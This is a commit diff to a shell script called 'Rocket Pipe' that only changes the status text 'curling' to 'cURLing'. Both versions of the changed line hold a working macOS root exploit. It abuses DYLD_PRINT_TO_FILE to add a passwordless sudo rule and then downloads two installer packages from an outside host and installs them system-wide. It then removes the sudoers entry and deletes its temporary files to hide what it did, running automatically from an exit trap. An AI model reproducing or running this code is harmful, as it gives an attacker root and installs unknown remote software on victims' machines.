Change "curling" to "cURLing"

diff --git a/Rocket Pipe b/Rocket Pipe
--- a/Rocket Pipe
+++ b/Rocket Pipe
@@ -27,6 +27,6 @@ echo;echo
 echo -e '\033[1mExploiting machine...\033[0m'
 echo
 function KeepSafe {
-  echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo bash -c 'time if [[ $EUID -ne 0 ]]; then echo -e "\033[1mFailed! No root!\033[0m $(exit 1)"; else sudo mkdir -v /tmp$$; echo;echo; echo -e "\033[1mcurling j8u60.pkg...\033[0m"; sudo curl -# http://thrifus.co/jump/j8u60.pkg > /tmp$$/j8u60.pkg; echo -e "\033[1mDone.\033[0m"; echo; echo -e "\033[1mcurling jfosx.pkg...\033[0m"; sudo curl -# http://thrifus.co/jump/jfosx.pkg > /tmp$$/jfosx.pkg; echo -e "\033[1mDone.\033[0m"; echo;echo; echo -e "\033[1mInstalling packages...\033[0m"; sudo installer -verbose -pkg /tmp$$/j8u60.pkg -target LocalSystem; echo; sudo installer -verbose -pkg /tmp$$/jfosx.pkg -target LocalSystem; echo; echo -e "\033[1mDone.\033[0m"; echo;echo; echo -e "\033[1mCleaning up exploited machine...\033[0m"; echo;echo; sudo sed -i "" "/NOPASSWD:ALL/d" /etc/sudoers; echo -e "\033[1mRemoving temporary files and directories...\033[0m"; echo -e "\033[1mRemoved: \033[0m"; rm -rfv /tmp$$; echo;echo; echo -e "\033[1mCompleted successfully.\033[0m"; fi; exit 0'
+  echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo bash -c 'time if [[ $EUID -ne 0 ]]; then echo -e "\033[1mFailed! No root!\033[0m $(exit 1)"; else sudo mkdir -v /tmp$$; echo;echo; echo -e "\033[1mcURLing j8u60.pkg...\033[0m"; sudo curl -# http://thrifus.co/jump/j8u60.pkg > /tmp$$/j8u60.pkg; echo -e "\033[1mDone.\033[0m"; echo; echo -e "\033[1mcURLing jfosx.pkg...\033[0m"; sudo curl -# http://thrifus.co/jump/jfosx.pkg > /tmp$$/jfosx.pkg; echo -e "\033[1mDone.\033[0m"; echo;echo; echo -e "\033[1mInstalling packages...\033[0m"; sudo installer -verbose -pkg /tmp$$/j8u60.pkg -target LocalSystem; echo; sudo installer -verbose -pkg /tmp$$/jfosx.pkg -target LocalSystem; echo; echo -e "\033[1mDone.\033[0m"; echo;echo; echo -e "\033[1mCleaning up exploited machine...\033[0m"; echo;echo; sudo sed -i "" "/NOPASSWD:ALL/d" /etc/sudoers; echo -e "\033[1mRemoving temporary files and directories...\033[0m"; echo -e "\033[1mRemoved: \033[0m"; rm -rfv /tmp$$; echo;echo; echo -e "\033[1mCompleted successfully.\033[0m"; fi; exit 0'
 }
 trap KeepSafe exit
